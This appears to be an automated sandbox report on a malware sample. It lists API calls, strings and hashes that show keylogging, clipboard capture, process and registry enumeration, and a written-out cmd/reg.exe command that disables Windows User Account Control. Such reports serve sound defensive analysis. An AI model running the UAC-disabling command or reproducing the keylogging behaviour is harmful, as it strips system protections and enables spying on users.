                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Enum$InfoQueryValue
                                                                                                            • String ID: [regsplt]$DG
                                                                                                            • API String ID: 3554306468-1089238109
                                                                                                            • Opcode ID: 2c0c651cac9b710f1168a485f464d1fc739dd231b9536622f25106be1a0f90b4
                                                                                                            • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                            • Opcode Fuzzy Hash: 2c0c651cac9b710f1168a485f464d1fc739dd231b9536622f25106be1a0f90b4
                                                                                                            • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                            • API String ID: 2974294136-753205382
                                                                                                            • Opcode ID: aa5d334bcd1812922a4ad084044b3d1b343442b21def6a42fbfd5f9bd3c8e3e6
                                                                                                            • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                            • Opcode Fuzzy Hash: aa5d334bcd1812922a4ad084044b3d1b343442b21def6a42fbfd5f9bd3c8e3e6
                                                                                                            • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EventLocalTimewsprintf
                                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                            • API String ID: 1497725170-248792730
• Opcode ID: dbc4a2a758c63c1510e987d26333f1bba1f1b77e24aef8622eec758640aef2d7
• Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
• Opcode Fuzzy Hash: dbc4a2a758c63c1510e987d26333f1bba1f1b77e24aef8622eec758640aef2d7
• Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
• Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
• CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID: `AG
• API String ID: 1958988193-3058481221
• Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
• Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
• Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
• Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

APIs
• RegisterClassExA.USER32(00000030), ref: 0041CA6C
• CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
• GetLastError.KERNEL32 ref: 0041CA91
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
• Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
• Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
• Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
• Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5

APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
• CloseHandle.KERNEL32(?), ref: 00406A0F
• CloseHandle.KERNEL32(?), ref: 00406A14
Strings
• C:\Windows\System32\cmd.exe, xrefs: 004069FB
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
• Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002), ref: 004425F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
• FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000), ref: 0044262F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
• Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C

APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
• RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
• RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc$BG
• API String ID: 1818849710-2233081382
• Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
• Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
• Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
• Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
• Opcode ID: c920db2117b9ebb21b6f907faadff67bbda6cb2284db632f5ba91f60e6129f46
• Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
• Opcode Fuzzy Hash: c920db2117b9ebb21b6f907faadff67bbda6cb2284db632f5ba91f60e6129f46
• Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B

APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
• Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
• Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
• Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
• Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79

APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
• GetProcAddress.KERNEL32(00000000), ref: 00401441
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll$`#v
• API String ID: 1646373207-1032071883
• Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
• Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
• Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
• Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E

Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
• Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
• Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
• Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9

APIs
  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
• GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
• SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
• String ID:
• API String ID: 3525466593-0
• Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
• Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
• Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
• Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99

APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 4269425633-0
• Opcode ID: 0d775c34279de42def04f5e4a5f6fbb11c5f8ae86916d795950b7c30c7907390
• Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
• Opcode Fuzzy Hash: 0d775c34279de42def04f5e4a5f6fbb11c5f8ae86916d795950b7c30c7907390
• Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A

APIs
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                            • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                            • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                            • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                            • __freea.LIBCMT ref: 0044FFC4
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                            • String ID:
                                                                                                            • API String ID: 313313983-0
                                                                                                            • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                            • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                            • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                            • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                            • _free.LIBCMT ref: 0044E1A0
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 336800556-0
                                                                                                            • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                            • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                            • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                            • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00434403,00434403,?,00445359,00446B42,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?), ref: 00446F48
                                                                                                            • _free.LIBCMT ref: 00446F7D
                                                                                                            • _free.LIBCMT ref: 00446FA4
                                                                                                            • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FB1
                                                                                                            • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FBA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3170660625-0
                                                                                                            • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                            • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                            • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                            • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 0044F7B5
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 0044F7C7
                                                                                                            • _free.LIBCMT ref: 0044F7D9
                                                                                                            • _free.LIBCMT ref: 0044F7EB
                                                                                                            • _free.LIBCMT ref: 0044F7FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                            • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                            • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00443305
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00443317
                                                                                                            • _free.LIBCMT ref: 0044332A
                                                                                                            • _free.LIBCMT ref: 0044333B
                                                                                                            • _free.LIBCMT ref: 0044334C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                            • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                            • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                            APIs
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                            • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                            • String ID: (FG
                                                                                                            • API String ID: 3142014140-2273637114
                                                                                                            • Opcode ID: 6c16c17156e3f772358f7467e06c9b2cfcef92d79dd8da7b0064c4f82c90d24e
                                                                                                            • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                            • Opcode Fuzzy Hash: 6c16c17156e3f772358f7467e06c9b2cfcef92d79dd8da7b0064c4f82c90d24e
                                                                                                            • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                            APIs
                                                                                                            • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                            • _free.LIBCMT ref: 0044D5C5
                                                                                                              • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00434403,?,?,?,00434403,00000016,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                                              • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,?,00434403), ref: 0043A878
